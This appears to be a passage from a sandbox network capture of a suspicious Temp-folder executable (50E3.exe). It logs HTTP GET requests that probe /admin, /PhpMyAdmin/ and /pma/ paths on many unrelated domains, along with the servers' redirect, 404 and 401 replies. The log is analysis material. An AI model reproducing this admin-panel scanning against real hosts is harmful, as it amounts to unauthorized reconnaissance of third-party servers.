Nov 30, 2023 11:22:46.932467937 CET	564	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.2mail.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.651070=a0329bc2-2c6f-4d7e-8275-cce45a31a621; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:19 GMT Connection: close Content-Length: 138 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 32 6d 61 69 6c 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.2mail.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
250	192.168.2.4	57986	15.197.142.173	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.882946014 CET	222	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: m7l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.986021042 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-234.ec2.internal X-Request-Id: a8f217b7-77c0-46d4-8e3f-4d888d82884f Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
251	192.168.2.4	59037	104.238.144.219	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:47.434921980 CET	218	OUT	GET /admin HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:47.568345070 CET	530	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:47 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/admin Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/admin">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
252	192.168.2.4	58605	68.183.34.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:47.597455978 CET	217	OUT	GET / HTTP/1.1 Host: www.hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:47.779759884 CET	1340	IN	HTTP/1.1 200 OK Date: Thu, 30 Nov 2023 10:22:47 GMT Server: Apache/2.4.57 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:47 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=r02spifaue948tivmononnamq4; path=/ Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1625 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii: W[S8~N~:&$m!P0GXE$2{t)0m\|2zqhd(Ec34K-ihz:b1XGo24l~3tL#s6G/-U0]QA=JI7T32NXJ@(rw@TZ9Bk8"@a`_#I8PzMtBGJK`J%4<@8 ue/tIL-K]P>74X+k8-&]E%Qp3p@z<!J,z'3_yS,Vgj,BfjGK.e"K@22bV)=sp62YCrkwfJ s!"AcrH x?:x9pho1KgwofK3~^NN/o.>pE!--"xe]f`n`Mq215ecfR+wrdZrc9"'GKQ"%Ly75r`2-p4fRd\5dsq8;j,NI<Qa3Yl48sNEHE&auP3p-flSsaj+sSM.42)]RiP{ doWI
Nov 30, 2023 11:22:47.779767036 CET	833	IN	Data Raw: ce a9 30 13 26 71 07 55 51 6d 02 70 9f 74 05 01 6e 90 b9 41 ee a6 71 cf 23 88 56 ee f2 0b ff dd 6f a2 d2 6a 7d 90 d1 21 e6 98 2d 35 4d 95 cd ed 1a 6a 03 00 f8 a9 82 8d 05 6e 15 c3 4f 95 42 84 e2 1a a7 29 98 71 f5 21 1c be df df 1b be 7b 0b d5 f8 Data Ascii: 0&qUQmptnAq#Voj}!-5MjnOB)q!{.&sbqm\808&ron#CI9b>;'rzlzpmu&:jrkA#FhzV(D-f\!5*9Zhc<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
253	192.168.2.4	58456	157.7.44.171	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:47.598643064 CET	219	OUT	GET /admin/ HTTP/1.1 Host: gmaso.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:47.864427090 CET	653	IN	HTTP/1.1 401 Unauthorized Date: Thu, 30 Nov 2023 10:22:47 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 381 Connection: keep-alive Server: Apache WWW-Authenticate: Basic realm="" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
254	192.168.2.4	59148	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:47.769886017 CET	215	OUT	GET /pma/ HTTP/1.1 Host: m7l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:47.872400999 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:47 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-167.ec2.internal X-Request-Id: b84016b3-f4b3-4aa3-8b6f-a819a9627283 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
255	192.168.2.4	59036	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:47.771987915 CET	215	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:47.953582048 CET	436	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:47 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
256	192.168.2.4	59710	15.197.172.60	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:47.774940014 CET	214	OUT	GET /admin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:47.875399113 CET	920	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:47 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_IYOotm36EkZJ/wSY2Rspnym9CwsvlpKD5IUeEHZkqXfKgPEPmp4/2cwYdLKMYRmw3pqKdrGhm5x7/Ma095rewQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.88;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:48.079622030 CET	920	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:47 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_IYOotm36EkZJ/wSY2Rspnym9CwsvlpKD5IUeEHZkqXfKgPEPmp4/2cwYdLKMYRmw3pqKdrGhm5x7/Ma095rewQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.88;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
257	192.168.2.4	59684	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:48.065485001 CET	215	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:48.244412899 CET	436	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:48 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
258	192.168.2.4	59720	15.197.172.60	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:48.066157103 CET	214	OUT	GET /admin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:48.165730000 CET	921	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:48 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_IYOotm36EkZJ/wSY2Rspnym9CwsvlpKD5IUeEHZkqXfKgPEPmp4/2cwYdLKMYRmw3pqKdrGhm5x7/Ma095rewQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:48.371881008 CET	921	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:48 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_IYOotm36EkZJ/wSY2Rspnym9CwsvlpKD5IUeEHZkqXfKgPEPmp4/2cwYdLKMYRmw3pqKdrGhm5x7/Ma095rewQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
259	192.168.2.4	60251	54.209.32.212	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:48.067996025 CET	218	OUT	GET /admin HTTP/1.1 Host: bjail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:48.168884993 CET	202	IN	HTTP/1.1 302 Found content-length: 0 date: Thu, 30 Nov 2023 10:22:47 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com

Session ID	Source IP	Source Port	Destination IP	Destination Port
260	192.168.2.4	60303	54.209.32.212	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:48.110094070 CET	224	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: bjail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:48.215208054 CET	202	IN	HTTP/1.1 302 Found content-length: 0 date: Thu, 30 Nov 2023 10:22:47 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com

Session ID	Source IP	Source Port	Destination IP	Destination Port
261	192.168.2.4	60248	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:48.148895979 CET	215	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:48.329843998 CET	436	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:48 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data 